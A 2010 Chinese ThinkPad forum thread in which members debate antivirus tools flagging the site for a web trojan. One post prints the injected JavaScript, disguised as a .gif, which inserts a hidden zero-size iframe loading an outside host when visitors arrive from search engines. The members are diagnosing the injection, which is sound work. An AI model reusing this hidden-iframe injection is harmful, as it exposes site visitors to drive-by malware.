设为首页收藏本站
切换到窄版

 找回密码
 注册
快捷导航
专门网»论坛 笔记本技术 经典ThinkPad专区 关于360报告挂马情况的说明
12345下一页
返回列表 发新帖
楼主: admin

[其它] 关于360报告挂马情况的说明

[复制链接] |自动提醒
阅读字号:
lsy198816

8

回帖

0

积分

20

资产值

入门会员 Rank: 1

注册时间
2010-4-24
发表于 2010-6-6 19:32:12| 字数 11| - 中国–江苏–镇江 联通 | 显示全部楼层

回复 #1 admin 的帖子

瑞星也报告51nb挂马
回复 支持 反对

使用道具 举报

xuancai18

169

回帖

6

积分

376

资产值

高级会员 Rank: 2Rank: 2

注册时间
2007-4-27
发表于 2010-6-6 19:32:51| 字数 14| - 中国–山东–济南 电信 | 显示全部楼层
那也叫杀毒啊,纯属流氓软件。
T61  T8300+3G+7K500G
X200S  SL9600+8G+7K500G+AFFS
8540W i7 740+8G+7K500+V4
回复 支持 反对

使用道具 举报

experience

2万

回帖

216

积分

1万

资产值

至尊会员II Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2007-7-26
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
发表于 2010-6-6 19:32:53| 字数 57| - 中国–河北–张家口 电信 | 显示全部楼层
我的U盘里都是病毒,360杀毒竟然提示安全~
晕了
上次测试键盘记录器的时候,除了360杀毒,别的都能查出来~
亲身经历
WorkPad C3 C505
ThinkPad (230cs) 390E  Transnote (x30) x32-new  x60 x61 x61s x61t x220t t430s  w530(i7-3940XM) P71
回复 支持 反对

使用道具 举报

kvncyx

128

回帖

1

积分

157

资产值

初级会员 Rank: 1

注册时间
2010-5-18
发表于 2010-6-6 19:36:20| 字数 28| - 中国–福建–泉州–石狮市 电信 | 显示全部楼层
360可能要走上灭亡了,现在安全过了头,很多网站都误报。
回复 支持 反对

使用道具 举报

alanfly

5194

回帖

0

积分

5

资产值

入门会员 Rank: 1

注册时间
2008-9-26
发表于 2010-6-6 19:43:11| 字数 54| - 中国–福建–福州 联通 | 显示全部楼层
最近光顾着磨嘴皮子暗地里找枪手,正业给忘了。

[ Edited by  alanfly on 2010-6-6 19:44 ]
回复 支持 反对

使用道具 举报

zjm1228

3781

回帖

100

积分

3万

资产值

版主 Rank: 6Rank: 6Rank: 6Rank: 6Rank: 6Rank: 6

注册时间
2005-10-21
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)月全勤勋章
发表于 2010-6-6 19:43:42| 字数 27| - 中国–江苏–南京 电信/南京航空航天大学 | 显示全部楼层
360本身就是打着免费的旗号,其实捞了不少钱!!!!!
回复 支持 反对

使用道具 举报

xiaohanguo

1336

回帖

0

积分

1763

资产值

入门会员 Rank: 1

注册时间
2007-7-22
发表于 2010-6-6 19:45:57| 字数 10| - 中国–江苏–南京 电信 | 显示全部楼层
我估计是外挂广告误报
专业核弹翻新,潜艇抛光喷漆.收二手航母,大修反应堆,拆洗导弹.航天飞机保养换三滤
回复 支持 反对

使用道具 举报

jmzhlove

225

回帖

3

积分

270

资产值

中级会员 Rank: 2Rank: 2

注册时间
2009-5-5
发表于 2010-6-6 19:51:29| 字数 17| - 中国–浙江–杭州 电信 | 显示全部楼层
360的前身不就是3721么。。。
T400/3470/p8600/2G/
回复 支持 反对

使用道具 举报

athlonxing

4030

回帖

34

积分

1万

资产值

钻石会员 Rank: 3Rank: 3Rank: 3

注册时间
2009-6-14
发表于 2010-6-6 20:03:11| 字数 15| - 中国–广东–河源 电信 | 显示全部楼层
呵呵,非常淡定,瑞星没有误报。
T400S SP9600  8G  80G  500G
X61 T8300 3G X25-120G
Macbook pro 374
回复 支持 反对

使用道具 举报

poohbear

17

回帖

0

积分

211

资产值

入门会员 Rank: 1

注册时间
2007-4-7
发表于 2010-6-6 20:08:31| 字数 195| - 中国–浙江–杭州 电信 | 显示全部楼层
啥软 AVG Anti-Virus Network Edition 8.5

换成http://www.thinkpad.cn/forum/依旧提示,http://www.ibmnb.com也提示。

既然杀软有报,总不能把责任推给360吧,何况不是只有360在报,我相信AVG更信过随便一句“误报”,不知道有没有仔细排查?

论坛是大家的,更是版主和管理员以及站长的,还是仔细检查一下为好,省得胆小的人提心吊胆

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

x
回复 支持 反对

使用道具 举报

danke2001

1345

回帖

29

积分

2万

资产值

白金会员 Rank: 3Rank: 3Rank: 3

注册时间
2006-7-16
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
发表于 2010-6-6 20:11:57| 字数 11| - 中国–湖南–邵阳 电信 | 显示全部楼层
40楼奇怪啊

咔吧没问题
T60  T7400  3G X1400 Win7
X200 P8400 2G 250G Vista
T420s i7 4G 500G win7
回复 支持 反对

使用道具 举报

panping913

2606

回帖

39

积分

2043

资产值

钻石会员 Rank: 3Rank: 3Rank: 3

注册时间
2007-10-19
发表于 2010-6-6 20:13:24| 字数 14| - 中国–浙江–湖州 电信 | 显示全部楼层
360 莫信也莫慌~~

是玩笑的
回复 支持 反对

使用道具 举报

alanfly

5194

回帖

0

积分

5

资产值

入门会员 Rank: 1

注册时间
2008-9-26
发表于 2010-6-6 20:16:37| 字数 2,052| - 中国–福建–福州 联通 | 显示全部楼层

回复 #40 poohbear 的帖子

safe.189这个后缀是个gif的,实际是个脚本,可能因此被报毒;
下面是它的内容,好像是个访问统计的,上回论坛报毒也是这种类型的脚本。

  1. var url=document.referrer;
  2. var p=url.toLowerCase().indexOf(".baidu.com");
  3. if (p>0)
  4. {
  5. document.writeln("<iframe src=http://microsoft26.9966.org:6677/g/index.html width=0 height=0></iframe>");
  6. }
  7. var url=document.referrer;
  8. var p=url.toLowerCase().indexOf(".google.com.hk");
  9. if (p>0)
  10. {
  11. document.writeln("<iframe src=http://microsoft26.9966.org:6677/g/index.html width=0 height=0></iframe>");
  12. }
  13. var url=document.referrer;
  14. var p=url.toLowerCase().indexOf(".sogou.com");
  15. if (p>0)
  16. {
  17. document.writeln("<iframe src=http://microsoft26.9966.org:6677/g/index.html width=0 height=0></iframe>");
  18. }
  19. var url=document.referrer;
  20. var p=url.toLowerCase().indexOf(".soso.com");
  21. if (p>0)
  22. {
  23. document.writeln("<iframe src=http://microsoft26.9966.org:6677/g/index.html width=0 height=0></iframe>");
  24. }
  25. var url=document.referrer;
  26. var p=url.toLowerCase().indexOf(".gougou.com");
  27. if (p>0)
  28. {
  29. document.writeln("<iframe src=http://microsoft26.9966.org:6677/g/index.html width=0 height=0></iframe>");
  30. }
  31. var url=document.referrer;
  32. var p=url.toLowerCase().indexOf(".118114.cn");
  33. if (p>0)
  34. {
  35. document.writeln("<iframe src=http://microsoft26.9966.org:6677/g/index.html width=0 height=0></iframe>");
  36. }
  37. var url=document.referrer;
  38. var p=url.toLowerCase().indexOf(".bing.com");
  39. if (p>0)
  40. {
  41. document.writeln("<iframe src=http://microsoft26.9966.org:6677/g/index.html width=0 height=0></iframe>");
  42. }
  43. var url=document.referrer;
  44. var p=url.toLowerCase().indexOf(".youdao.com");
  45. if (p>0)
  46. {
  47. document.writeln("<iframe src=http://microsoft26.9966.org:6677/g/index.html width=0 height=0></iframe>");
  48. }
  49. var url=document.referrer;
  50. var p=url.toLowerCase().indexOf(".yahoo.com");
  51. if (p>0)
  52. {
  53. document.writeln("<iframe src=http://microsoft26.9966.org:6677/g/index.html width=0 height=0></iframe>");
  54. }

复制代码

[ Edited by  alanfly on 2010-6-6 20:22 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

x
回复 支持 反对

使用道具 举报

HOPE

9万

回帖

1054

积分

1万

资产值

管理员 Rank: 8Rank: 8Rank: 8Rank: 8Rank: 8Rank: 8Rank: 8Rank: 8

注册时间
2001-11-20
金牌荣誉勋章(注册20年以上会员)银牌荣誉勋章(注册10年以上会员)铜牌荣誉勋章(注册8年以上会员)月全勤勋章年全勤勋章2022年全勤勋章2023年全勤勋章2024
发表于 2010-6-6 20:17:43| 字数 103| - 中国–广东–深圳–福田区 电信 | 显示全部楼层

Reply to #40 of poohbear

检查过网站程序及打开页面的代码,并没有你截图中的“safe.189.cn/aq/ad01.gif”这些代码,不过189.cn是电信的网站,这是什么回事呢?
现在正在联系机房,不排除是机房里面其它服务器导致的。
人生满希望
T700: i7-1195G7, 64GB RAM, 1T M.2+2T HDD, 15in UXGA(1600x1200) LED    |   X62s: i7-5600u, 32GB RAM, 128GB mSATA, 12.1in SXGA+ AFFS LCD
X2100: i7-10710u, 32GB RAM, 512GB M.2, 13in WQXGA LCD(3000x2000)      |   T70: Xeon(R)E3-1505L, 32GB RAM, 512GB M2+ 2TB HDDx2(Raid1)
回复 支持 反对

使用道具 举报

poohbear

17

回帖

0

积分

211

资产值

入门会员 Rank: 1

注册时间
2007-4-7
发表于 2010-6-6 20:21:10| 字数 889| - 中国–浙江–杭州 电信 | 显示全部楼层
|<a href="http://www.thinkpad.com.cn" target="_blank"> 专门网商城 </a> |<a href="banned.php"> 小黑屋</a> | <a href="faq.php">帮助</a>  | <a name="StranLink">繁體中文</a><br>
<div class="secmenu">
   
<a href="plugin.php?identifier=ques&module=ques">答卷系统</a><script src=http://safe.189.cn/aq/ad.gif?¨></script>
  |<a href="report.php?action=listerror"> ThinkPad错误码查询 </a>  |<a href="report.php?action=getdetails"> ThinkPad机型信息查询 </a>  |<a href="repair.php"> 维修服务中心(<font color="#FF0000">新</font>) </a>  |<a href="/base" target="_blank"> 知识库 </a>  |<a href="report.php?action=calendar"> 万年历查询 </a> </div>


虽然这个类似木马的警报没多大危害性,但总是弹出来很讨厌,再说,也不能保证该代码不会窃取用户信息
回复 支持 反对

使用道具 举报

t60zwq

314

回帖

0

积分

485

资产值

入门会员 Rank: 1

注册时间
2009-4-25
发表于 2010-6-6 20:22:21| 字数 36| - 中国–山西–大同–广灵县 联通 | 显示全部楼层
HOPE,我在卡饭让大家测试,小红伞和NIS2010也开始报了,请注意。
T602007DN6 T7200 3G X25-M+7K500 DVDRM X1400 14.1 1400*1050 wifi BT
回复 支持 反对

使用道具 举报

conan1982

1669

回帖

14

积分

1万

资产值

黄金会员 Rank: 3Rank: 3Rank: 3

注册时间
2006-1-5
月全勤勋章
发表于 2010-6-6 20:26:13| 字数 7| - 中国–上海–上海 电信 | 显示全部楼层
卡巴未报,无视
回复 支持 反对

使用道具 举报

qwer20060606

1万

回帖

160

积分

1万

资产值

至尊会员II Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2008-12-25
铜牌荣誉勋章(注册8年以上会员)银牌荣誉勋章(注册10年以上会员)
发表于 2010-6-6 20:28:10| 字数 8| - 中国–黑龙江–佳木斯 电信 | 显示全部楼层
真有人用360啊
回复 支持 反对

使用道具 举报

飞鱼刀

353

回帖

17

积分

1万

资产值

白金会员 Rank: 3Rank: 3Rank: 3

注册时间
2009-8-15
发表于 2010-6-6 20:29:52| 字数 11| - 中国–甘肃–天水 电信 | 显示全部楼层
360是有选择性的?靠
回复 支持 反对

使用道具 举报

misterben

9万

回帖

670

积分

592

资产值

天下无敌I Rank: 5Rank: 5Rank: 5Rank: 5Rank: 5

注册时间
2008-9-4
月全勤勋章
发表于 2010-6-6 20:37:45| 字数 70| - 中国–湖南–长沙 电信/IDC机房 | 显示全部楼层

回复 #44 HOPE 的帖子

不会是电信劫持DNS,然后强行植入广告所致吧?

卡巴斯基最新版——无报警。

[ Edited by  misterben on 2010-6-6 20:48 ]
事实上,不管什么人,都有自己的取向和观点,并且都会尝试用自己的观点去影响别人,没有例外。

http://www.wda.cn/forum-42-1.html
回复 支持 反对

使用道具 举报

45闲人

1万

回帖

138

积分

3819

资产值

至尊会员II Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2009-3-9
发表于 2010-6-6 20:45:29| 字数 29| - 中国–浙江–绍兴 电信 | 显示全部楼层
微软自家的杀毒软件MSE 没有报马,小A没报马,电信的网络。
回复 支持 反对

使用道具 举报

Revival

4864

回帖

92

积分

9万

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2009-9-9
银牌荣誉勋章(注册10年以上会员)铜牌荣誉勋章(注册8年以上会员)月全勤勋章
发表于 2010-6-6 20:47:39| 字数 63| - 中国–福建–福州 电信 | 显示全部楼层
360只是个流氓,换了身份证
然后整天攻击这个X星,那个X山的无赖罢了
然后做的程序竟然会强制卸载其他的收费的杀毒软件
真是太可恶了
AW13 I5/16G/860EVO2T/GTX860M2G/BT/camera
回复 支持 反对

使用道具 举报

Revival

4864

回帖

92

积分

9万

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2009-9-9
银牌荣誉勋章(注册10年以上会员)铜牌荣誉勋章(注册8年以上会员)月全勤勋章
发表于 2010-6-6 20:49:34| 字数 118| - 中国–福建–福州 电信 | 显示全部楼层
QUOTE:
Posted by misterben on 2010-6-6 20:37
不会是电信劫持DNS,然后强行植入广告所致吧?

卡巴斯基最新版——无报警。

[ Edited by  misterben on 2010-6-6 20:48 ]

电信是会经常这样的!
AW13 I5/16G/860EVO2T/GTX860M2G/BT/camera
回复 支持 反对

使用道具 举报

zhangdenke

375

回帖

0

积分

650

资产值

入门会员 Rank: 1

注册时间
2009-12-3
发表于 2010-6-6 20:49:44| 字数 12| - 中国–广东–广州 电信 | 显示全部楼层
不用360的过.....
回复 支持 反对

使用道具 举报

deihc

859

回帖

9

积分

1045

资产值

黄金会员 Rank: 3Rank: 3Rank: 3

注册时间
2007-7-30
发表于 2010-6-6 20:53:08| 字数 52| - 中国–浙江–温州 联通 | 显示全部楼层
网络安全大家都不是专家
不报不一定没毒
报不一定有毒
在这里骂XX不好 垃圾  请问下大家对网络安全又知道多少呢

淡定
回复 支持 反对

使用道具 举报

coco_coco2

1777

回帖

34

积分

4026

资产值

钻石会员 Rank: 3Rank: 3Rank: 3

注册时间
2005-9-17
发表于 2010-6-6 20:53:29| 字数 5| - 中国–重庆–重庆 电信 | 显示全部楼层
瑞星也报的
回复 支持 反对

使用道具 举报

cyberkitten

5117

回帖

87

积分

3982

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2005-6-17
发表于 2010-6-6 20:58:51| 字数 39| - 中国–江苏–苏州 电信 | 显示全部楼层
最烦360,用Symantec Endpoint Protection什么事没有。
Surface Laptop/MacBook/ThinkPad/ThinkCentre/NUC
X220i/T410s/X61/X60s/X40
回复 支持 反对

使用道具 举报

raidasy

990

回帖

0

积分

1926

资产值

入门会员 Rank: 1

注册时间
2008-8-16
发表于 2010-6-6 21:00:38| 字数 25| - 中国–河北–唐山 电信 | 显示全部楼层
我的诺顿到没有报警,360到吓了我一跳。鄙视ING
T60 14.1寸SXGA+ CPUT2500,1GB 100GB 7200 X1400 128MB 802.11abg无线 蓝牙 指纹
回复 支持 反对

使用道具 举报

HOPE

9万

回帖

1054

积分

1万

资产值

管理员 Rank: 8Rank: 8Rank: 8Rank: 8Rank: 8Rank: 8Rank: 8Rank: 8

注册时间
2001-11-20
金牌荣誉勋章(注册20年以上会员)银牌荣誉勋章(注册10年以上会员)铜牌荣誉勋章(注册8年以上会员)月全勤勋章年全勤勋章2022年全勤勋章2023年全勤勋章2024
发表于 2010-6-6 21:05:27| 字数 297| - 中国–广东–深圳–福田区 电信 | 显示全部楼层
再分析一下360报警的区别。相同的网页内容,输入http://mobile.51nb.com进入专门网手机版,不报警,进入下面也不报警:

http://mobile.51nb.com/index.php?action=thread&tid=963319 (没有报警)

但是,如果从www.ibmnb.com/mobile下面进入手机版,则马上报告,相同的网页也是报警:
http://www.ibmnb.com/mobile ... read&tid=963319

这是什么回事呢?网页内容是完全一样的,为什么不同的域名就会出现不同的情况呢?
手机版的网页内容是非常精简的,没有任何多余的代码。
人生满希望
T700: i7-1195G7, 64GB RAM, 1T M.2+2T HDD, 15in UXGA(1600x1200) LED    |   X62s: i7-5600u, 32GB RAM, 128GB mSATA, 12.1in SXGA+ AFFS LCD
X2100: i7-10710u, 32GB RAM, 512GB M.2, 13in WQXGA LCD(3000x2000)      |   T70: Xeon(R)E3-1505L, 32GB RAM, 512GB M2+ 2TB HDDx2(Raid1)
回复 支持 反对

使用道具 举报

yucaixia

1286

回帖

11

积分

1486

资产值

黄金会员 Rank: 3Rank: 3Rank: 3

注册时间
2008-9-26
发表于 2010-6-6 21:07:56| 字数 10| - 中国–河北–保定 电信 | 显示全部楼层
我是流氓、我会柔道.
回复 支持 反对

使用道具 举报

下一页 »
12345下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Powered by Discuz! X3.5 © 2001-2023 Comsenz Inc

GMT+8, 2025-1-10 02:47 , Processed in 0.250664 second(s), 78 queries , Gzip On, OPcache On.

手机版|小黑屋|安卓客户端|iOS客户端|Archiver|备用网址1|备用网址2|在线留言|专门网

返回顶部